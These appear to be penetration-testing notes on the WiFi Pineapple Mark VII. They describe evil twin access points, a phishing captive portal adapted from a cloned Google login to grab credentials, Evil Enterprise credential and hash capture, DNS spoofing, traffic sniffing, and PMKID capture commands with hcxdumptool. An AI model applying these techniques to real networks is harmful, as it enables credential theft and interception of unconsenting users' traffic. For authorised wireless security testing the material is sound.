WiFi Pineapple Mark VII
Set up:
https://docs.hak5.org/wifi-pineapple/setup
Access via web:
Campaigns
Automatically perform the following type of campaigns:
- Reconnaissance - Monitor Only
Passively monitor client device and access point activity within a defined region of the WiFi environment.
- Client Device Assessment - Passive
Identify client devices susceptible to basic rogue access points or evil twin attacks. Uses a passive PineAP mode to mimic access points only upon direct request. Depending on filter configuration, client devices may be allowed to associate with the WiFi Pineapple.
- Client Device Assessment - Active
Identify client devices susceptible to advanced rogue access points or evil twin attacks. Uses an active PineAP mode to broadcast an SSID pool, mimicking all access points listed. New access points may be dynamically added to the pool. Depending on filter configuration, client devices may be allowed to associate with the WiFi Pineapple.
Attacks
PineAP
When you desing a campaign, you are telling PineAP how to behave.
Advanced options:
Impersonate APs: Explicitly advertise lists of access points to instigate clients into connecting to previously saved networks.
Open SSID
Serve a basic, unencrypted Open access point, or automatically impersonate any Open access point requested by a client.
- Basic Open Access Point
The basic Open access point can be configured as visible or hidden; a hidden access point does not advertise its SSID, but clients which have saved the SSID will still be able to identify it, and some tools may still reveal the SSID.
- Multiple Open Access Points
When "Impersonate All Networks" is enabled, the WiFi Pineapple will answer for all SSIDs which are permitted by the filter configuration!
Filters can be used to tune the responses for your engagement, by either allowing all SSIDs in the filter list, or denying all SSIDs not in the filter list.
- Evil Portal Module
Set up an open AP with a login portal to perform phishing attacks, choose the desired template or upload a custom one.
To set up a custom capative portal, load Google template (https://github.com/kleo/evilportals/tree/master/portals) and use "save web page" extension to save the target page to simulate, then adapt it to the php google template to grab credentials and load it changing index within the pineapple GUI and not loading a new whole folder.
Evil WPA AP
The Evil WPA access point is used to impersonate a WPA (or WPA2) PSK network. It can also be used to collect partial handshakes for use with external cracking tools when the PSK is not known.
Be sure to allow your Evil WPA SSID in your filter configuration, or clients will not be able to connect!
These half-handshakes can be leveraged by hashcat to attack the original passphrase.
Evil Enterprise
Serve a WPA-Enterprise network with optional key exchange degradation. Coupled with automatic authorization of all accounts, identify misconfigured enterprise clients and capture credentials.
It is protected by a SSL certificate, which must be created first.
Properly configured WiFi Enterprise clients will reject unknown certificates, however many devices do not offer proper configuration and may either blindly accept new certificates, or prompt the user to accept the certificate.
There are three authentication types:
- Any
Clients connecting with EAP-GTC will connect as normal and the user login saved, while clients connecting with EAP-MSCHAPv2 will receive an error, but the MSCHAPv2 hash challenge will be captured and logged.
- MSCHAPv2
Most common authentication method for enterprise clients. A MSCHAPv2 client uses a hashed authentication method which does not disclose the password.
A MSCHAPv2 client will not be able to fully connect to the WiFi Pineapple access point, but the challenge hash will be captured and logged.
- GTC
Clients using GTC will disclose the full username and password, and will connect to the WiFi Pineapple as normal. The username and password will be logged.
DNS Spoofing
Once we have clients connected to our malicious AP, we can spoof DNS to redirect victims to our malicious site with the DNSspoff (https://github.com/90N45-d3v/DNSspoof-Pineapple-MK7-Module#preview) module.
MDK4 Toolkit
https://github.com/hak5/pineapple-modules/tree/master/mdk4
PMKID Attack
opkg install ca-bundle ca-certificates
opkg update
opkg install hcxdumptool
hcxdumptool -i wlan1mon -o pmkids-capture.pcapng --enable_status=1
hcxpcapngtool -o pmkids-capture.txt pmkids-capture.pcapng
Techniques
Control access with Filters
Limit your engagement by configuring access by filters. Limit to specific clients or SSIDs, or exclude specific clients or SSIDs.
Recon
- Main recon page
On the main Recon page, click on scan to start scanning.
You can search for Access Points or Clients by SSID, BSSID, or MAC address.
You can expand all clients automatically by going to the Recon Settings via the gear icon, and choosing "Expand all client lists"
Active Access Points and Clients can be automatically highlighted to make finding them easier by clicking on Recon Settings > Highlight Active Devices.
By clicking on an AP or Client in the list, a side menu will slide out, from where you can select options specific to the type of device you selected, such as capturing handshakes or cloning, or adding MAC addresses to the Filters.
- Tagged parameters
Tagged parameters are included in the beacon packets which advertise a WiFi network, and contain information about the encryption, channel selection, surrounding traffic, and more.
- Security Information
Simplified explanation of the security options employed by the network.
Sniffing
Once we have clients connected to our malicious AP, we can sniff their network activity.
- tcpdump Module
Once we have clients conected to our malicious AP, click on clients tab, identify in which interface is the client target listening, then click on the tcpdump tab and start listening in that interface. (br-lan most of the times)
- HTTPeek Module
HTTPeek displays all images, urls, cookies, and post data sent in plaintext by clients connected to the Wifi Pineapple.
Handshakes
We can click on the Automatic Handshake Capture button or target a specific network for handshake capture by selecting the network, then selecting "Capture Handshakes" from the menu.
The Handshakes tab shows any captured handshakes. Handshakes are captured in PCAP and Hashcat's 22000 format.
Handshakes that list Recon Capture as the source show that they were captured during a Recon scan or a Recon handshake capture.
Handshakes captured from the Evil WPA AP show as Evil WPA/2 Twin.
Last updated